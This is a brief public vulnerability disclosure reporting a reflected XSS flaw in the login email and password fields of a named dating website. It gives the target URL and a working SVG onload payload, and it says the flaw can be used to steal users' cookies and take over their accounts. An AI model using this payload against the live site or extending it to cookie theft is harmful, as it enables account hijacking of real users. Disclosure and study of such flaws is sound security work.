russian-dating Relected Cross Site Scripting Vunlerability

2019.06.06

B14ck_Dz (DZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#_________________________________________________________#
  Title        : russian-dating.com Relected Cross Site Scripting Vunlerability
#_________________________________________________________#
  Author : B14ck ( www.fb.com/unknownkid18 )
#_____________________________________#
  Tested On : Backbox 5.2 (Linux)
#__________________________#
  Date       : 05/06/2019
#__________________#

This Vulnerability Can Lead u to Gain Access for Mumber Account After Stealing His Cookies

Vulnerable Login Page Field(Email & Password) to XSS =)

-> [!] URL: https://russian-dating.com/logIn

-> [!] Payload : "><svg/onload=prompt("Testing XSS");>

See this note in RAW Version

Vote for this issue:

66%

34%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

russian-dating Relected Cross Site Scripting Vunlerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.